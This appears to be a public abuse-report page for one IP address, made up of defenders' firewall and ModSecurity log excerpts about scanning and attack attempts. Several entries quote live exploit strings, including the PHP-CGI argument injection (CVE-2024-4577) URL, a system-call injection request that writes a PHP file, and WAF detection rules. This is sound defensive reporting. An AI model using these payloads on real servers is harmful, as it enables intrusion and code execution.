yukon.ca
2024-11-10 04:33:55
(1 month ago)
Web Server Enforcement Violation: PHP CGI Argument Injection (CVE-2024-4577)
Port:80
Hacking
Exploited Host
subnetprotocol
2024-11-10 02:23:54
(1 month ago)
10/Nov/2024:03:23:53.462145 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 150.109.13.113] ModSecurity: Warning. Pattern match "(?:<\\\\\\\\?(?:[^x]|x[^m]|xm[^l]|xml[^\\\\\\\\s]|xml$|$)|<\\\\\\\\?php|\\\\\\\\[(?:\\\\\\\\/|\\\\\\\\\\\\\\\\)?php\\\\\\\\])" at ARGS_NAMES:<?php echo md5("cmd"); ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "66"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <?p found within ARGS_NAMES:<?php echo md5(\\\\x22cmd\\\\x22); ?>: <?php echo md5(\\\\x22cmd\\\\x22); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.subnetprotocol.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "ZzAZOQ994egrNdHQnT1pcAAAAFI"]
10/Nov/2024:03:23:53.462145 +0100Apache-Error: [fi
Hacking
Web App Attack
thefoofighter
2024-11-09 23:58:27
(1 month ago)
[Sat Nov 09 23:58:26.706878 2024] [:error] [pid 3452356] [client 150.109.13.113:52623] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "93"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sourcemodding.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "Zy_3Il6vApa9NN8xHP1JlQAAAAc"], referer: https://www.sourcemodding.com/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
[Sat Nov 09 23:58:27.736154 2024] [:error] [pid 3452356] [client 150.109.13.113:52623] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLO
Bad Web Bot
Web App Attack
paissangroup
2024-11-09 22:08:54
(1 month ago)
Multiple WAF Violations
Web App Attack
CrystalMaker
2024-11-09 20:36:00
(1 month ago)
PHP vulnerability scan - GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input; GET /index.php?s=captcha; GET /xxxx.php
Web App Attack
AbuseIPDB
AbuseIPDB Official
2024-11-09 17:11:42
(1 month ago)
Suspicious Operation. Request content:
_method=__construct&method=GET&filter[]=system&get[]=echo ^xinghuoxise^--xinghuoxise >xxxx.php
Web App Attack
oh.mg
2024-11-09 13:24:07
(1 month ago)
(mod_security) mod_security (id:949110) triggered by 150.109.13.113 (SG/Singapore/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: [Sat Nov 09 13:23:59.715796 2024] [:error] [pid 3037359:tid 140622807664384] [client 150.109.13.113:54895] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "184"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [ver "OWASP_CRS/4.0.0-rc1"] [tag "anomaly-evaluation"] [hostname "oh.mg"] [uri "/index.php"] [unique_id "Zy9ib4IsltiqjL-nIm2@MAAAAEw"], referer: https://oh.mg/index.php?s=captcha
Port Scan
Anonymous
2024-11-08 13:24:45
(1 month ago)
(wordpress) Failed wordpress login from 150.109.13.113 (SG/Singapore/-/Singapore/-/[redacted])
Brute-Force
TPI-Abuse
2024-11-08 03:24:27
(1 month ago)
(mod_security) mod_security (id:240335) triggered by 150.109.13.113 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 07 22:24:21.270863 2024] [security2:error] [pid 3099:tid 3099] [client 150.109.13.113:64003] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 150.109.13.113 (+1 hits since last alert)|procigar.org|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "procigar.org"] [uri "/xmlrpc.php"] [unique_id "Zy2EZZzJFGZRPRYTxGyLJQAAAAk"], referer: https://procigar.org/xmlrpc.php
Brute-Force
Bad Web Bot
Web App Attack
cmbplf
2024-11-07 22:00:06
(1 month ago)
5.333 POST requests in 1 hour (1w6d18h)
Brute-Force
Bad Web Bot
Anonymous
2024-10-29 13:04:16
(1 month ago)
Web App Attack
Cloudkul Cloudkul
2024-10-29 01:25:06
(1 month ago)
Attempted Not Found (404 status code) requests on our application, more than 30% of their total requests.
Brute-Force
Web App Attack
COMAITE
2024-10-28 10:10:16
(1 month ago)
Multiple web server 400 error codes from same source ip 150.109.13.113.
Web App Attack
FeG Deutschland
2024-10-28 09:24:03
(1 month ago)
Looking for CMS/PHP/SQL vulnerabilities - 13
Exploited Host
Web App Attack
Anonymous
2024-10-26 00:33:00
(1 month ago)
WAF detection: Cross-site scripting
Hacking